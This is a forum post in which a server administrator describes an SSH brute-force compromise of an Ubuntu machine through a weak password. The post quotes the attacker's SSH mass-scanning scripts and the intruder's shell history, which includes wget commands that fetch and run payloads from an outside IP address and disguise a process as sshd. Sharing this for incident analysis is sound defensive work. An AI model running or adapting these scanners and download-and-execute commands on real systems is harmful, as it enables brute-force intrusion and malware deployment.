Back again after one tough night inspecting the whole server....
And indeed there was an account with too poor password so I change it to a strong one kill the process drop ssh via iptables... And now that's fine after one night...
Still looking for rootkit but seems to be safe as it tried to brute force the root account which as of course a strong password.
Just for info here is the script that was running :
go.sh:
Code:
./ss 22 -b $1 -i eth0 -s 6
cat bios.txt |sort | uniq > mfu.txt
./ssh-scan
rm -f bios.txt
ssh-scan:
Code:
#!/bin/bash
clear
rm -rf $1.ps.$2
echo "#=====#==================================#=====#"
echo "#= R =# SSH AUTO SCANNER BY REGELE & CO #= R =#"
echo "#= E =#------- #BlackCat TEAM -------#= E =#"
echo "#= G =#----------------------------------#= G =#"
echo "#= E =# ® ALL RIGHTS RESERVED TO Regele ®#= E =#"
echo "#= L =# Now Just Sit Back End Relax #= L =#"
echo "#= E =# IPs founder... ACTIVATING!!! #= E =#"
echo "#Range from -> $1.0.0"
echo "#Range to -> $1.255.255"
echo "#Looking on -> PORT $2"
./ps $1 $2
sleep 5
cat $1.ps.$2 |sort |uniq > mfu.txt
oopsnr2=`grep -c . mfu.txt`
sleep 5
echo "#---Relax ... Take it Easy---#"
cat 1 > pass_file
sleep 3
./ssh 150
cat 2 > pass_file
sleep 3
./ssh 150
...
...
...
cat 63 > pass_file
sleep 3
./ssh 150
cat 64 > pass_file
sleep 3
./ssh 150
echo "# It's over, you cand go outside and play now #"
.history of the user:
Code:
15 cd /var/tmp
16 ls -a
17 /sbin/ifconfig |grep inet
18 wget http://213.131.252.251/japjap/mech.tgz ; tar zxvf mech.tgz ; cd flash ; ./h -s "/usr/sbin/sshd" ./mech ; cd .. ; rm -rf flash mech.tgz
19 cat /proc/cpuinfo
20 nuame -a
21 uname -a
22 wget arhive.blajan.org/2009.tgz
23 tar zxvf
24 wget arhive.blajan.org/xpl.tgz
25 wget http://213.131.252.251/japjap/irc.tgz ; tar zxvf irc.tgz ; rm -rf irc.tgz ; cd irc ; ./x 66.252 22
26 ./x 194.0 22;./x 194.1 22;./x 194.2 22;./x 194.3 22;./x 194.4 22;./x 194.5 22;./x 194.6 22;./x 194.7 22;./x 194.8 22;./x 194.9 22;./x 194.10 22;./x 194.11 22;./x 194.12 22;./x 194.13 22;./x 194.14 22;./x 194.15 22;./x 194.16 22;./x 194.17 22;./x 194.18 22;./x 194.19 22;./x 194.20 22;./x 194.21 22;./x 194.22 22;./x 194.23 22;./x 194.24 22;./x 194.25 22;./x 194.26 22;./x 194.27 22;./x 194.28 22;./x 194.29 22;./x 194.30 22;./x 194.31 22;./x 194.32 22;./x 194.33 22;./x 194.34 22;./x 194.35 22;./x 194.36 22;./x 194.37 22;./x 194.38 22;./x 194.39 22;./x 194.40 22;./x 194.41 22;./x 194.42 22;./x 194.43 22;./x 194.44 22;./x 194.45 22;./x 194.46 22;./x 194.47 22;./x 194.48 22;./x 194.49 22;./x 194.50 22
27 ls
28 rm -rf 194*
29 cat vuln.txt
30 ls
31 rm -rf vuln.txt
32 ls
33 ./x 78.24 22
34 w
35 ps x
36 w
37 cd /var/tmp
38 ls -a
39 cd irc
40 ls
41 cat vuln.txt
42 w
43 ps x
44 cd /var/tmp
45 /sbin/ifconfig |grep inet
46 wget http://213.131.252.251/japjap/mech.tgz ; tar zxvf mech.tgz ; cd flash ; ./h -s "/usr/sbin/sshd" ./mech ; cd .. ; rm -rf flash mech.tgz
47 ls
48 cd irc
49 ls
50 cat vuln.txt
51 rm -rf vuln.txt
52 cd ..
53 rm -rf irc
54 wget http://213.131.252.251/japjap/r.tgz ; tar zxvf r.tgz ; rm -rf r.tgz ; cd boss ; ls
55 ls
56 ./x 78.24 22
57 ls
58 cat vuln.txt
59 ./x 72.52 22
So well segfault are really strange indeed I think that segmentation fault comes from inside the Ubuntu server once he corrupted the user he tried from the inside...Well just a guess.
Thanks anyway !
Ciao,
Sismon
PS:Obviousely he was using the /var/tmp to write everything...
Bookmarks